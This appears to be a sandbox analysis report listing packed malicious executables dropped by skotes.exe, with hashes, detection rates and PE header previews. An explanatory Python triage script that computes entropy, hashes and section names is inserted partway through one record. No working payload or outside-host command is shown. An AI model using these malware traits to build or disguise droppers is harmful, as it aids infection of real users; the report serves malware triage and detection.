                                                                                                                                                                                                                                        MD5:FE1B27214B9109A571700417FDCCDA52
                                                                                                                                                                                                                                        SHA1:85D8C8FC81B1B90F0B27385D1DC0975E32FB26C1
                                                                                                                                                                                                                                        SHA-256:A277014D5CDFADBFC4D32A5A80F8A453A2CE09C166CDAA40C915BA5821B593F1
                                                                                                                                                                                                                                        SHA-512:884654EE5B1BD1654718AA9AB1B1BA31B842B8F5AE03BC2E9282D1C371E9BCA794A52E0B86B0DE684DA5B47CEAF5A860D097EF36A155D371651487DD8FB17515
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@..................................fD...@... ............................._pt.s....`t.....................|y..............................,y...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... ..8...t......`(.............@...wssfkfzg.............b(.............@...hxglgwdo.............^C.............@....taggant.0......."...dC.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):972800
                                                                                                                                                                                                                                        Entropy (8bit):6.708509026528111
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8ajxvj:DTvC/MTQYxsWR7ajxv
                                                                                                                                                                                                                                        MD5:B491AAFA5C2DE82CA9EE4FEB7B1CD477
                                                                                                                                                                                                                                        SHA1:DE15B7014F0732C945ED22D273EC451658C39A48
                                                                                                                                                                                                                                        SHA-256:D7B75AAA69694C274F81AEEB056095F8C06308FF6BECCE6EBE51AC1B20A92B94
                                                                                                                                                                                                                                        SHA-512:09596C7418031EA5C380C9508856B074D2CEFD38218DCEE3ADAD23FFB3880EB73F9F225B8EDF9BDF2100865FC1E28525F9B608131532C11951569CAAB0E7EDDA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....dg.........."..........(......w.............@..........................0.......'....@...@.......@.....................d...|....@...l.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....l...@...n..................@..@.reloc...u.......v...b..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6291456
                                                                                                                                                                                                                                        Entropy (8bit):7.9590825651098696
                                                                                                                                                                                                                                        Encrypted:false
SSDEEP:98304:kFDUN43WQqbA1CjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6aXtMyy:kUmWQv1YOjmFwDRxtYSHdK34kdai7bNF
MD5:63EFECD388A74A9CDEB79CD7C8020E7E
SHA1:3A51D5D618E1CC8FD6CE3D251FF7EE63FB210345
SHA-256:391BB01CEC85D1327585E279470FC1C849CB14CE9998C59ECC55C60580EAC288
SHA-512:F7DAC83BD3FAD5F473190FF65A3B09C6AE18B64BC7D42CD4672BFA021D1C69E86D290923CCD9D1FCCC18034CDE52669AE78547304C929B2B8228E182DE701E7F
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...-.dg.........."....).....p...... ..........@.....................................-_...`.................................................4...x....p..<....@..8"..b.^.H$......d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...<....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1885696
Entropy (8bit):7.9502129539309525
Encrypted:false
SSDEEP:49152:xygWjRQ3HLL/piTRSyEvGqpGl3Ao1cVPeb3ymHw2NG:ggrHpi8yhqclT1vtN
MD5:25FB9C54265BBACC7A055174479F0B70
SHA1:4AF069A2EC874703A7E29023D23A1ADA491B584E
SHA-256:552F8BE2C6B2208A89C728F68488930C661B3A06C35A20D133EF7D3C63A86B9C
SHA-512:7DFD9E0F3FA2D68A6CE8C952E3B755559DB73BB7A06C95AD6ED8AC16DEDB49BE8B8337AFC07C9C682F0C4BE9DB291A551286353E2E2B624223487DC1C8B54668
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................J.....%-....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...uzxdwyvi.P... 0..B...^..............@...efzdldig.....pJ.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):21504
Entropy (8bit):5.336742061370928
Encrypted:false
SSDEEP:384:JiynHMEyyp/He7ik+KcJB669mNPBqVgYERHtNNVYISZS1d7RroV5:PHvtm7ik+KcJB6jRHkISZShkn
MD5:14BECDF1E2402E9AA6C2BE0E6167041E
SHA1:72CBBAE6878F5E06060A0038B25EDE93B445F0DF
SHA-256:7A769963165063758F15F6E0CECE25C9D13072F67FA0D3C25A03A5104FE0783A
SHA-512:16B837615505F352E134AFD9D8655C9CABFA5BFCFBEE2C0C34F2D7D9588AA71F875E4E5FEB8CDF0F7BACC00F7C1CA8DABD3B3D92AFC99ABF705C05C78E298B4A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 54%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pm;..........."...0..J..........:i... ........@.. ....................................`..................................h..O...................................Th..8............................................ ............... ..H............text...@I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................i......H........6..p1...........................................................0..8.......s2.....(....}<.....}=.....};....|<.....(...+.|<...(....*.0..P........~.........,B.r...p(.....rc..p(.....(.....r...p.(....(......(....o......(......*.0..8.......s,.....(....}......}......}.....|......(...+.|....(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):1374720
Entropy (8bit):7.0671827674657335
Encrypted:false
SSDEEP:24576:fYlZH+uQDPYLZtPikfLyXFD3qRc4f6GO4k88P9VB77Ml8fmMxHr:fYu7DPYLZtakzyVD3ELCh//+8fmW
MD5:669ED3665495A4A52029FF680EC8EBA9
SHA1:7785E285365A141E307931CA4C4EF00B7ECC8986
SHA-256:2D2D405409B128EEA72A496CCFF0ED56F9ED87EE2564AE4815B4B116D4FB74D6
SHA-512:BEDC8F7C1894FC64CDD00EBC58B434B7D931E52C198A0FA55F16F4E3D44A7DC4643EAA78EC55A43CC360571345CD71D91A64037A135663E72EED334FE77A21E6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 28%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h.D..........&....&..........................@..........................p......\U....@... ..............................P..........,l.......................c...................................................T...............................text...............................`..`.data...H...........................@....rdata..............................@..@.eh_fram............p..............@..@.bss....4....@...........................idata.......P......................@....CRT....8....p.......$..............@....tls.................&..............@....rsrc...,l.......n...(..............@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1730560
Entropy (8bit):7.932352607527081
Encrypted:false
SSDEEP:49152:jxdPvB0tMvfTRGnbR2RW7mzTXNT+a99J9shct:jHPv9lGT6bNKirs
MD5:19A558B4786AD821CFC44513D9E0AA28
SHA1:62E74215F0B73D4E95283EE88CE028DA8E0F4629
SHA-256:6B32A3D15D1D03D6EEC2261B77503F5323CFCD10E3C79B4BDFE6CAF36F6CDA12
SHA-512:A1711F804DB37019D68FCEF616CC9111D9D3FDDD856860AFF6D431D5F010A1650B2D2E4FA4CF873A2BFCA1FA4504361718D017E4038698EFBECB2B5FB5955D5B
Malicious:true
Reputation:unknown
Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............D.. ...`....@.. ........................D.....Sd....`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@... ..)..........8..............@...efaooxfi. ...`*......:..............@...covnxbgl. ....D......B..............@....taggant.@....D.."...F..............@...........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1911296
Entropy (8bit):7.941764620524562
Encrypted:false
SSDEEP:49152:CpowwwwaaEprit+X7KAzt4UH2Em9bUPy+qVreck:C+wwwwrEpriQH2HbUK+0k
MD5:FA9DABF05AA60D08C5AA57DA09837347
SHA1:88A9ADDAA50CB80831ABA6B36D704353D4753E12
SHA-256:4B3630F249424EF95829D548318C1ACCED7B7A8568B476F9532EB11AAFA721AC
SHA-512:CFE298155074E25A8668D920958691B5AB21C26BD5AB67C95C0C0E53DAD95476B95EA849567DBE8DED9AE0B780F74495FA0F8167FC48C29048F40D9EAFAC7F03
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@...................@.................................tf......................................[.A.o.....@......................................................D...................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..(...A.....................@...bdfnosox.@....j..2..................@...zlaaehby............................@....taggant.0......"..................@...........................................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Reputation:unknown
Preview:@...e...........................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6291456
Entropy (8bit):7.9590825651098696
Encrypted:false
SSDEEP:98304:kFDUN43WQqbA1CjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6aXtMyy:kUmWQv1YOjmFwDRxtYSHdK34kdai7bNF
MD5:63EFECD388A74A9CDEB79CD7C8020E7E
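The per-file fields above are what an analyst re-derives first when confirming a sandbox verdict: the Entropy (8bit) values of 7.93 to 7.96 on the droppers written by skotes.exe (versus 5.34 on the small .NET stub) point at packing, and the section names visible in their previews (uzxdwyvi, efzdldig, efaooxfi, covnxbgl, bdfnosox, zlaaehby and .taggant alongside .rsrc and .idata) are what the "PE file contains section with special chars" signature keys on. As an added example that is not part of the Joe Sandbox report, the following Python recomputes those triage fields: the 8-bit Shannon entropy, the MD5/SHA1/SHA-256 the report prints, and the names from the PE section table, flagging names outside a standard set. Both inputs are constructed: a header-only synthetic PE32 carrying the section names seen above (no code, not one of the dropped binaries), and a 64-byte buffer with the same byte distribution as the 64-byte powershell.exe artefact directly above (61 NUL bytes plus three distinct non-zero bytes; only the '@' and 'e' are in the preview, the third byte and the positions are assumed), which reproduces its reported entropy of 0.3472659751. The standard-section list and the packed-entropy threshold are this example's assumptions, not values from the report.

```python
import hashlib
import math
import struct
from collections import Counter

# Section names that common Windows linkers emit. Assumption for this example
# (not a list from the report); anything outside it is worth a second look.
STANDARD_SECTIONS = {
    ".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".idata", ".edata",
    ".tls", ".bss", ".CRT", ".eh_fram", ".xdata", ".gfids", ".didat", ".00cfg",
}

# Assumed threshold: the packed droppers in the report sit at 7.93..7.96 bits/byte,
# the unpacked .NET stub at 5.34.
PACKED_ENTROPY_THRESHOLD = 7.2


def shannon_entropy_8bit(data: bytes) -> float:
    """Bits per byte, 0.0..8.0: the 'Entropy (8bit)' field of the report."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """MD5 / SHA1 / SHA-256 in the upper-case hex the report prints."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def pe_section_names(data: bytes) -> list:
    """Walk the PE section table and return the 8-byte section names, NUL-stripped."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
    number_of_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional     # first IMAGE_SECTION_HEADER
    names = []
    for i in range(number_of_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        if len(raw) < 8:
            break                            # truncated section table
        names.append(raw.rstrip(b"\0").decode("latin-1"))
    return names


def suspicious_sections(names: list) -> list:
    """Random-looking names (uzxdwyvi, efzdldig) and .taggant all land here."""
    return [n for n in names if n not in STANDARD_SECTIONS]


def triage(data: bytes) -> dict:
    """The per-file fields a dropped-files table reports, plus two derived flags."""
    entropy = shannon_entropy_8bit(data)
    try:
        names = pe_section_names(data)
    except ValueError:
        names = []                           # not a PE: no section table to inspect
    return {
        "size": len(data),
        "entropy": entropy,
        "likely_packed": entropy > PACKED_ENTROPY_THRESHOLD,
        "sections": names,
        "suspicious_sections": suspicious_sections(names),
        **hashes(data),
    }


def build_fake_pe(section_names) -> bytes:
    """Constructed sample: a header-only PE32 carrying the given section names, no code."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    opt = bytes(0xE0)                        # zeroed PE32 optional header of the usual size
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), 0, 0, 0, 0, 0, 0, 0, 0, 0x60000020)
        for n in section_names
    )
    return bytes(dos) + b"PE\0\0" + coff + opt + table


# Constructed: the section names seen in the packed droppers' previews.
FAKE_PE = build_fake_pe([".text", ".rsrc", ".idata", "uzxdwyvi", "efzdldig", ".taggant"])

# Constructed: 64 bytes with the same byte distribution as the 64-byte powershell.exe
# artefact (61 NULs plus three distinct non-zero bytes). '@' and 'e' come from the
# preview; the third byte (0x01) and the exact positions are assumed.
POWERSHELL_LIKE = b"@\0\0\0e\0\0\0\x01" + b"\0" * 55

if __name__ == "__main__":
    for label, blob in (("fake_pe", FAKE_PE), ("powershell_artefact", POWERSHELL_LIKE)):
        print(label, triage(blob))
```

Entropy alone does not separate a packer from a legitimately compressed resource, which is why the section names are checked in the same pass: the .taggant section and the eight-character random names are a stronger packer indicator than any entropy threshold, and a .NET stub like the 21504-byte console assembly above will sit well under the threshold while still being malicious.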
                                                                                                                                                                                                                                        SHA1:3A51D5D618E1CC8FD6CE3D251FF7EE63FB210345
                                                                                                                                                                                                                                        SHA-256:391BB01CEC85D1327585E279470FC1C849CB14CE9998C59ECC55C60580EAC288
                                                                                                                                                                                                                                        SHA-512:F7DAC83BD3FAD5F473190FF65A3B09C6AE18B64BC7D42CD4672BFA021D1C69E86D290923CCD9D1FCCC18034CDE52669AE78547304C929B2B8228E182DE701E7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...-.dg.........."....).....p...... ..........@.....................................-_...`.................................................4...x....p..<....@..8"..b.^.H$......d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...<....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):810496
                                                                                                                                                                                                                                        Entropy (8bit):7.808597434734726
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:grtEhokkSG4bPWQ8C8z3zcB49CNPWQ8C8z3zcB49Cx:grGhokkSG4bPWQv8z3BYNPWQv8z3BYx
                                                                                                                                                                                                                                        MD5:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        SHA1:1D65F31526CC20AB41D6B1625D6674D7F13E326C
                                                                                                                                                                                                                                        SHA-256:B83449768E7AF68867C8BC42B19FF012722D88EA66AEF69DF48661E63E0EB15E
                                                                                                                                                                                                                                        SHA-512:80FAD90314FF639F538A72C5E4CA2BF9AE52B9309CAA7CD6F87D61791505BB3612B7F3190AB9B67348C5D71F4D29BB9D101E3F66D525EB9B5E2060A10B2D187A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....^g.........."......f........................@.......................................@.....................................P....p..........................x...........................x.......................`...|............................text...md.......f.................. ..`.rdata..............n..............@..@.data...,%... ......................@....CODE........P....... .............. ..`.tls.........`.......0..............@....rsrc........p.......2..............@..@.reloc..x............4..............@..B.bss.................R..............@....bss.........0......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2138232
                                                                                                                                                                                                                                        Entropy (8bit):7.940321732008107
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:VIfzw6NbHHBp7k5hhJ+j0h7x0vRNu1UiPPs0EkHbG+nu:VILwYt5ShrfKvW0z
                                                                                                                                                                                                                                        MD5:E5F8753995C0B30B827AA2B17F3E1D22
                                                                                                                                                                                                                                        SHA1:B268EE165073321CB893FC6DC682ADBE38AF87B5
                                                                                                                                                                                                                                        SHA-256:C3A4EC523039D5969745279B8909FBB82BFC999D9241E24B5CEFEA23A3F2C04F
                                                                                                                                                                                                                                        SHA-512:DBA6104720C45C3201878C515DAC487B0F66522E85DB56CF19B4378D4DA94D38E640EB48259A6CA3FD8602B083283915BDEBDC8BB57039F1CDD2FE84792BA2FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~............b......b..<....b.....)^......................................... ...... ......%...... ......Rich............PE..L...~.r\............................y.............@.......................................@............................4.......<.......4............................n..T...........................(...@...............\...T... ....................text...d........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...4...........................@..@.reloc........... ...z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):776832
                                                                                                                                                                                                                                        Entropy (8bit):7.859727158445845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                                                                                        MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                        SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                                                                                        SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                                                                                        SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1885696
                                                                                                                                                                                                                                        Entropy (8bit):7.9502129539309525
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:xygWjRQ3HLL/piTRSyEvGqpGl3Ao1cVPeb3ymHw2NG:ggrHpi8yhqclT1vtN
                                                                                                                                                                                                                                        MD5:25FB9C54265BBACC7A055174479F0B70
                                                                                                                                                                                                                                        SHA1:4AF069A2EC874703A7E29023D23A1ADA491B584E
                                                                                                                                                                                                                                        SHA-256:552F8BE2C6B2208A89C728F68488930C661B3A06C35A20D133EF7D3C63A86B9C
                                                                                                                                                                                                                                        SHA-512:7DFD9E0F3FA2D68A6CE8C952E3B755559DB73BB7A06C95AD6ED8AC16DEDB49BE8B8337AFC07C9C682F0C4BE9DB291A551286353E2E2B624223487DC1C8B54668
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................J.....%-....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...uzxdwyvi.P... 0..B...^..............@...efzdldig.....pJ.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1114112
                                                                                                                                                                                                                                        Entropy (8bit):7.7336985855739355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
                                                                                                                                                                                                                                        MD5:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                        SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
                                                                                                                                                                                                                                        SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
                                                                                                                                                                                                                                        SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2039808
Entropy (8bit): 7.95190511268852
Encrypted: false
SSDEEP: 49152:i8yCHGX33Su8Usgk5msPWY14O5Sb7D0Otq+qMnf/w4/T:iPXyuog/Av5/QFqMnf/ww
MD5: 6D4A011DDE3AE4DD05553B27D6FBFC75
SHA1: EB13D57E83CA18083A52BD4927E6039A0AD87F1E
SHA-256: DEC151D71C758D3ED3D86403DC1DEB28ECF80793144E32BC9EB0FC76D5209E86
SHA-512: FDA917FEF5BA08FEB485AB713DD03CA8AD40A5F451698F29DC356ED067967EC866F9D93725F79E79E13D282C01AD2754E15C02E162497B6626CC8829196CB5C6
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^........M...........@...........................M.....RL....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... ..+..........V..............@...fhxxuwls......2......X..............@...vzpihbtm......M.....................@....taggant.0....M.."..................@...........................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 21504
Entropy (8bit): 5.336742061370928
Encrypted: false
SSDEEP: 384:JiynHMEyyp/He7ik+KcJB669mNPBqVgYERHtNNVYISZS1d7RroV5:PHvtm7ik+KcJB6jRHkISZShkn
MD5: 14BECDF1E2402E9AA6C2BE0E6167041E
SHA1: 72CBBAE6878F5E06060A0038B25EDE93B445F0DF
SHA-256: 7A769963165063758F15F6E0CECE25C9D13072F67FA0D3C25A03A5104FE0783A
SHA-512: 16B837615505F352E134AFD9D8655C9CABFA5BFCFBEE2C0C34F2D7D9588AA71F875E4E5FEB8CDF0F7BACC00F7C1CA8DABD3B3D92AFC99ABF705C05C78E298B4A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 54%
Reputation: unknown
